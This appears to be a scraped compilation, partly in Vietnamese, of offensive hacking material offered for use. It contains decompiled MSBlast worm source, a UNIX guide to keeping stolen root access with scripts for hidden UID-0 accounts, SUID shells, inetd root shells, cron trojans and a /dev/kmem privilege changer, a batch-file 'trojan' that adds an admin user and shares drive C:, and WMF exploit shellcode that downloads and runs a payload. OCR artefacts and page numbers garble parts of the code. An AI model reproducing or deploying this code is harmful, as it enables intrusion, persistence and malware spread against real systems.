day_of_month[3]; LPWSADATA WSAData; HKEY hKey; DWORD ThreadId; bool status; /* Registry Key manipulation We create the key if it doesn't exist, otherwise it is opened Then we give the value "msblast.exe" to the key "windows auto update"

Windows Auto Update is now set to run on boot up, which will run MSBlast.exe */ RegCreateKeyExA(0x80000002,

"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, 0, 0, 0xf003f, 0, & hKey, 0); RegSetValueExA(hKey, "windows auto update", 0, 1, "msblast.exe", 0x32);

RegCloseKey(hKey); /* Check to see if an instance of MSBlast.exe is already running, if there is one running then this instance exits */ CreateMutexA(0, 1, "BILLY"); if

(GetLastError() == 0xb7) ExitProcess(0); if ((WSAStartup(0x202, & WSAData) != 0) || (WSAStartup(0x101, & WSAData) != 0) || (WSAStartup(0x001, & WSAData) != 0)) return -1; /* We need to know where MSBlast.exe is located so that we can redistribute it. */ GetModuleFileNameA(0, &Filename, 0x104); /* Idle Event We wait for a connection to the internet to be established before we can proceed */ while

(InternetGetConnectedState(& ThreadId, 0) == 0) Sleep(0x4e20); /* Generate Random IP Address */ i_ip_D = 0; srand(GetTickCount()); randomip_A = rand() % 0xFE;

randomip_A++; randomip_B = rand() % 0xFE; /* Get Host Machine IP */ if

(gethostname(& local_ip_address, 0x200) != ffffffff) { _hostent = gethostbyname(& local_ip_address); if (_hostent != 0) { if (_hostent.hlength != 0) { memcpy( &in, &_hostent.hlength, 4); sprintf(&local_ip_address, "%s", inet_ntoa(in.S_un)); temp_ip_buf = strtok(&local_ip_address, "."); /* Split ip address into A.B.C.(D) */ i_ip_A = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_B = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_C = atoi(temp_ip_buf); if (i_ip_C > 0x14)

{ srand(GetTickCount()); i_ip_C -= rand() % 0x14; } /* Don't use Random IP Addresses */ randomip_A = i_ip_A; randomip_B = i_ip_B; status = true; } } }

srand(GetTickCount()); if ((rand() % 0x14) < 12) status = 0; i_ip_D_? = 1; if ((rand % 0xA) > 7) i_ip_D_? = 2; if (status == 0) { i_ip_A = rand() % 0xFE; i_ip_A++; i_ip_B = rand() % 0xFE; i_ip_C = rand() % 0xFE; } /* Get Date */ GetDateFormatA(0x409, 0, 0, &"d", &day_of_month, 3); GetDateFormatA(0x409, 0, 0, &"M", &month, 3); /* Payload. Run payload() if the date is right ??? */ if ( (atoi(& day_of_month) > 15) || (atoi(& month) > 8) ) CreateThread(0, 0, payload, 0, 0, &ThreadId); /* Spreadworm */ while (1)

spreadworm(); /* Sense of Humour The remainder of the code will never get executed */ WSACleanup(); return 0;}

Làm vài Backdoor chơi

Sau hướng dẫn viết Backdoor cọp py mạng Dốt tiếng anh nên không dám dịch Sợ dịch sai khơng thấy backdoor đâu mà lại chết > Có bác siêu English dịch dùm nhá

(29)

Ok You've been at it for all night Trying all the exploits you can think of The system seems tight The system looks tight

The system *is* tight You've tried everything Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect

permissions, race conditions, SUID exploits, Sendmail bugs, and so on Nothing WAIT! What's that!?!? A "#" ???? Finally!

After seeming endless toiling, you've managed to steal root Now what? How you hold onto this precious super-user

privilege you have worked so hard to achieve ?

This article is intended to show you how to hold onto root once you have it It is intended for hackers and administrators alike

From a hacking perspective, it is obvious what good this paper will you Admin's can likewise benefit from this paper Ever

wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your

system?

This list is BY NO MEANS comprehensive There are as many ways to leave backdoors into a UNIX computer as there are

ways into one Beforehand

Know the location of critical system files This should be obvious (If you can't list any of the top of your head, stop reading

now, get a book on UNIX, read it, then come back to me ) Familiarity with passwd file formats (including general field

format, system specific naming conventions, shadowing mechanisms, etc ) Know vi Many systems will not have those

robust, user-friendly editors such as Pico and Emacs Vi is also quite useful for needing to quickly seach and edit a large file If

you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a

nice, FAT scrollback buffer This will come in handy if you want to cut and paste code, rc files, shell scripts, etc

The permenance of these backdoors will depend completely on the technical saavy of the administrator The experienced and

skilled administrator will be wise to many (if not all) of these backdoors But, if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time

to come One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be

looking for back doors

The Overt

[1] Add a UID account to the passwd file This is probably the most obvious and quickly discovered method of rentry It

(30)

prepend or append it Anyone causally examining the passwd file will see this So, why not stick it in the middle

#!/bin/csh

# Inserts a UID account into the middle of the passwd file

# There is likely a way to this in 1/2 a line of AWK or SED Oh well

# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`

cd # Do this at home cp /etc/passwd /temppass # Safety first echo passwd file has $linecount[1] lines

@ linecount[1] /=

@ linecount[1] += # we only want temp files echo Creating two files, $linecount[1] lines each $or approximately that$

split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa cat /xab >> /xaa

mv /xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand rm /xa* /temppass

echo Done

NEVER, EVER, change the root password The reasons are obvious

[2] In a similar vein, enable a disabled account as UID 0, such as Sync Or, perhaps, an account somwhere buried deep in the

passwd file has been abandoned, and disabled by the sysadmin Change her UID to (and remove the '*' from the second

field)

[3] Leave an SUID root shell in /tmp #!/bin/sh

# Everyone's favorite

cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that chmod 4755 /tmp/.evilnaughtyshell

Many systems run cron jobs to clean /tmp nightly Most systems clean /tmp upon a reboot Many systems have /tmp mounted

to disallow SUID programs from executing You can change all of these, but if the filesystem starts filling up, people may

notice but, hey, this *is* the overt section ) I will not detail the changes neccessary because they can be quite system

specific Check out /var/spool/cron/crontabs/root and /etc/fstab

The Veiled

(31)

background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the

appropriate program (usally a server) when a connection request arrives The format of the /etc/inetd.conf file is simple Typical

lines look like this:

(1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd

Field (1) is the daemon name that should appear in /etc/services This tells inetd what to look for in /etc/services to determine

which port it should associate the program name with (2) tells inetd which type of socket connection the daemon will expect

TCP uses streams, and UDP uses datagrams Field (3) is the protocol field which is either of the two transport protocols, TCP

or UDP Field (4) specifies whether or not the daemon is iterative or concurrent A 'wait' flag indicates that the server will

process a connection and make all subsequent connections wait 'Nowait' means the server will accept a connection, spawn a

child process to handle the connection, and then go back to sleep, waiting for further connections Field (5) is the user (or more

inportantly, the UID) that the daemon is run as (6) is the program to run when a connection arrives, and (7) is the actual

command (and optional arguments) If the program is trivial (usally requiring no user interaction) inetd may handle it internally

This is done with an 'internal' flag in fields (6) and (7)

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it

with something else A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd

file, etc

For the insinuation-impaired, try this:

Open the /etc/inetd.conf in an available editor Find the line that reads:

daytime stream tcp nowait root internal and change it to:

daytime stream tcp nowait /bin/sh sh -i

You now need to restart /etc/inetd so it will reread the config file It is up to you how you want to this You can kill and

restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea

to this off peak hours)

[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice One

(32)

/etc/services as well as in /etc/inetd.conf The format of the /etc/services file is simple:

(1) (2)/(3) (4) smtp 25/tcp mail

Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name

associated with the service For instance, add this line to /etc/services:

evil 22/tcp evil and this line to /etc/inetd.conf:

evil stream tcp nowait /bin/sh sh -i Restart inetd as before

Note: Potentially, these are a VERY powerful backdoors They not only offer local rentry from any account on the system,

they offer rentry from *any* account on *any* computer on the Internet [6] Cron-based trojan I Cron is a wonderful system administration tool It is also a wonderful tool for backdoors, since root's

crontab will, well, run as root Again, depending on the level of experience of the sysadmin (and the implementation), this

backdoor may or may not last /var/spool/cron/crontabs/root is where root's list for crontabs is usally located Here, you have

several options I will list a only few, as cron-based backdoors are only limited by your imagination Cron is the clock daemon

It is a tool for automatically executing commands at specified dates and times Crontab is the command used to add, remove,

or view your crontab entries It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab A crontab

entry has six fields:

(1) (2) (3) (4) (5) (6)

* * /usr/bin/updatedb

Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week

(0-6) Field (6) is the command (or shell script) to execute The above shell script is executed on Mondays To exploit cron,

simply add an entry into /var/spool/crontab/root For example: You can have a cronjob that will run daily and look in the

/etc/passwd file for the UID account we previously added, and add him if he is missing, or nothing otherwise (it may not

be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your shady intentions) Add this line to /var/spool/crontab/root:

(33)

#!/bin/csh

# Is our eviluser still on the system? Let's make sure he is #daemon9@netcom.com

set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then # Is he there?

set linecount = `wc -l /etc/passwd`

cd # Do this at home cp /etc/passwd /temppass # Safety first @ linecount[1] /=

@ linecount[1] += # we only want temp files

split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa

cat /xab >> /xaa mv /xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm /xa* /temppass echo Done

else endif

[7] Cron-based trojan II This one was brought to my attention by our very own Mr Zippy For this, you need a copy of the

/etc/passwd file hidden somewhere In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root

account with a passwd of your choosing We run a cronjob that will, every morning at 2:30am (or every other morning), save a

copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!)

Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything

would be ok Add this line to root's crontab file: 29 * * * /bin/usr/sneakysneaky_passwd

make sure this exists:

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky

and this is the simple shell script: #!/bin/csh

(34)

cp /etc/passwd /etc/.temppass

cp /var/spool/mail/.sneaky /etc/passwd sleep 60

mv /etc/.temppass /etc/passwd

[8] Compiled code trojan Simple idea Instead of a shell script, have some nice C code to obfuscate the effects Here it is

Make sure it runs as root Name it something innocous Hide it well /* A little trojan to create an SUID root shell, if the proper argument is

given C code, rather than shell to hide obvious it's effects */ /* daemon9@netcom.com */

#include

#define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc;

char *argv[];{ int i=0;

if(argv[1]){ /* we've got an argument, is it the keyword? */

if(!(strcmp(KEYWORD,argv[1]))){

/* This is the trojan part */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); }

}

/* Put your possibly system specific trojan

messages here */

/* Let's look like we're doing something */

printf("Sychronizing bitmap image records.");

/* system("ls -alR / >& /dev/null > /dev/null&"); */ for(;i<10;i++){

fprintf(stderr,"."); sleep(1);

}

printf("\nDone.\n"); return(0);

} /* End main */

[9] The sendmail aliases file The sendmail aliases file allows for mail sent to a particular username to either expand to several

(35)

"decode: "|/usr/bin/uudecode"

to the /etc/aliases file Usally, you would then create a uuencoded rhosts file with the full pathname embedded

#! /bin/csh

# Create our rhosts file Note this will output to stdout echo "+ +" > tmpfile

/usr/bin/uuencode tmpfile /root/.rhosts

Next telnet to the desired site, port 25 Simply fakemail to decode and use as the subject body, the uuencoded version of the

.rhosts file For a one liner (not faked, however) this:

%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com You can be as creative as you wish in this case You can setup an alias that, when mailed to, will run a program of your

choosing Many of the previous scripts and methods can be employed here

The Covert

[10] Trojan code in common programs This is a rather sneaky method that is really only detectable by programs such tripwire

The idea is simple: insert trojan code in the source of a commonly used program Some of most useful programs to us in this

case are su, login and passwd because they already run SUID root, and need no permission modification Below are some

general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you

are backdooring (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)

Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:

get input;

if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue;

else quit with error;

Not complex or difficult Trojans of this nature can be done in less than 10 lines of additional code

The Esoteric

(36)

to modify the memory of the machine to change the UID of your processes To so requires that /dev/kmem have read/write

permission The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of

your current process, then spawn a csh, which will inherit this UID The following program does just that

/* If /kmem is is readable and writable, this program will change the user's

UID and GID to */

/* This code originally appeared in "UNIX security: A practical tutorial"

with some modifications by daemon9@netcom.com */ #include

#include #include #include #include #include #include

#define KEYWORD "nomenclature1" struct user userpage;

long address(), userlocation; int main(argc, argv, envp) int argc;

char *argv[], *envp[];{ int count, fd;

long where, lseek();

if(argv[1]){ /* we've got an argument, is it the keyword? */

if(!(strcmp(KEYWORD,argv[1]))){

fd=(open("/dev/kmem",O_RDWR); if(fd<0){

printf("Cannot read or write to /dev/kmem\n");

perror(argv); exit(10); }

userlocation=address();

where=(lseek(fd,userlocation,0);

if(where!=userlocation){

printf("Cannot seek to user page\n"); perror(argv);

(37)

count=read(fd,&userpage,sizeof(struct user));

if(count!=sizeof(struct user)){

printf("Cannot read user page\n"); perror(argv);

exit(30); }

printf("Current UID: %d\n",userpage.u_ruid); printf("Current GID: %d\n",userpage.g_ruid);

userpage.u_ruid=0; userpage.u_rgid=0;

where=lseek(fd,userlocation,0); if(where!=userlocation){

printf("Cannot seek to user page\n"); perror(argv);

exit(40); }

write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

execle("/bin/csh","/bin/csh","-i",(char *)0, envp);

} }

} /* End main */ #include

#include #include

#define LNULL ((LDFILE *)0) long address(){

LDFILE *object; SYMENT symbol; long idx=0;

object=ldopen("/unix",LNULL); if(!object){

fprintf(stderr,"Cannot open /unix.\n"); exit(50);

}

(38)

ldclose(object);

return(symbol.n_value); }

}

fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60);

}

[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take

care of this My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a

discrete amount of time (say minutes) and then restore the original permissions You can add this source to the source in [7]:

chmod 666 /dev/kmem

sleep 300 # Nap for minutes

chmod 600 /dev/kmem # Or whatever it was before

From The Infinity Concept Issue II

Tự làm "con trojan"

- Starting -

-:Server:-Mục đích share ổ C tạo user với quyền admin Bước 1:

Mở dos prompt notebook.

Dos prompt để ta kiểm tra command chuẩn chưa notebook để ta tạo file bat

Mở notebook đánh dòng lệnh sau: Lệnh 1-> net user abc /add

(tạo user có tên abc )

Lệnh 2-> net localgroup administrators abc /add Add user group

Lệnh 3->net share system=C:\ /unlimited Share ổ C

(39)

Lệnh 4-> net send ipcuaminh hello !

Khi mở file bat có mess gửi đến máy mình biết IP được

Xem ip dùng lệnh : ipconfig

-: Client

: -Sau tên bạn ta mở file bat, ta type lệnh sau máy

1 -> net use \\victim_ip abc 2-> explorer \\victimip\system

-Ai rảnh test xem Cái vui vẻ thui ko hoanh tráng nên ai thấy ngứa đừng chửi nhé, công ra

Cách tạo File WMF gắn vào web ! 0-Day exploit Code:

/* \

/ WMF nDay download() Exploit Generator \ by Unl0ck Research Team

/ \

/ greetz:

rst/ghc { ed, uf0, fost },

uKt { choix, nekd0, payhash, antq }, blacksecurity { #black } ,

0x557 { kaka, swan, sam, nolife }, sowhat, tty64 { izik };

This sploit is now full shit, so kiddies party has been started!!! urs,

darkeagle \

/ */

#include <stdio.h> #include <winsock2.h>

(40)

#define PROC_BEGIN asm _emit 0x90 asm _emit 0x90\

asm _emit 0x90 asm _emit 0x90\

asm _emit 0x90 asm _emit 0x90 #define PROC_END PROC_BEGIN

#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90" #define SEARCH_LEN #define MAX_SC_LEN 2048 #define HASH_KEY 13 // Define Decode Parameter

#define DECODE_LEN 21 #define SC_LEN_OFFSET #define ENC_KEY_OFFSET 11 #define ENC_KEY 0xff // Define Function Addr

#define ADDR_LoadLibraryA [esi] #define ADDR_GetSystemDirectoryA [esi+4] #define ADDR_WinExec [esi+8] #define ADDR_ExitProcess [esi+12] #define ADDR_URLDownloadToFileA [esi+16] // Need functions

unsigned char functions[100][128] =

{ // [esi] stack layout // kernel32 // 00 kernel32.dll {"LoadLibraryA"}, // [esi]

{"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""},

};

//q dài pót tượng trưng thơi

//

jmp sc_end

sc_start:

(41)

// Get kernel32.dll base addr

mov eax, fs:0x30 // PEB

mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink

lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address

mov esi, edi // Hash string start addr -> esi

// Get function addr of kernel32 push

pop ecx getkernel32:

call GetProcAddress_fun loop getkernel32

// Get function addr of urlmon push 0x00006e6f

push 0x6d6c7275 // urlmon push esp

call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address

/*

push pop ecx geturlmon:

call GetProcAddress_fun loop geturlmon

*/

call GetProcAddress_fun // url start addr = edi LGetSystemDirectoryA:

sub esp, 0x20 mov ebx, esp push 0x20 push ebx

call ADDR_GetSystemDirectoryA // GetSystemDirectoryA LURLDownloadToFileA:

// eax = system path size

// URLDownloadToFileA url save to a.exe

mov dword ptr [ebx+eax], 0x652E555C // "\U.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax

(42)

push eax

push ebx // %systemdir%\U.exe push edi // url

push eax

call ADDR_URLDownloadToFileA // URLDownloadToFileA //LWinExec:

mov ebx, esp

push 1//executes in SW_SHOW, push if you wanna in SW_HIDE

push ebx

call ADDR_WinExec // WinExec(%systemdir %\a.exe);

Finished:

//push

call ADDR_ExitProcess // ExitProcess(); GetProcAddress_fun:

push ecx push esi

mov esi, [ebp+0x3C] // e_lfanew

mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va

push esi

mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va

xor ecx, ecx dec ecx find_start: inc ecx lodsd

add eax, ebp xor ebx, ebx hash_loop:

movsx edx, byte ptr [eax] cmp dl, dh

jz short find_addr

ror ebx, HASH_KEY // hash key add ebx, edx

inc eax

jmp short hash_loop find_addr:

cmp ebx, [edi] // compare to hash jnz short find_start

pop esi // ExportDirectory

mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va

mov cx, [ebx+ecx*2] // FunctionOrdinal

(43)

mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va

stosd // function address save to [edi]

pop esi pop ecx ret

sc_end:

call sc_start

PROC_END //C macro to end proc }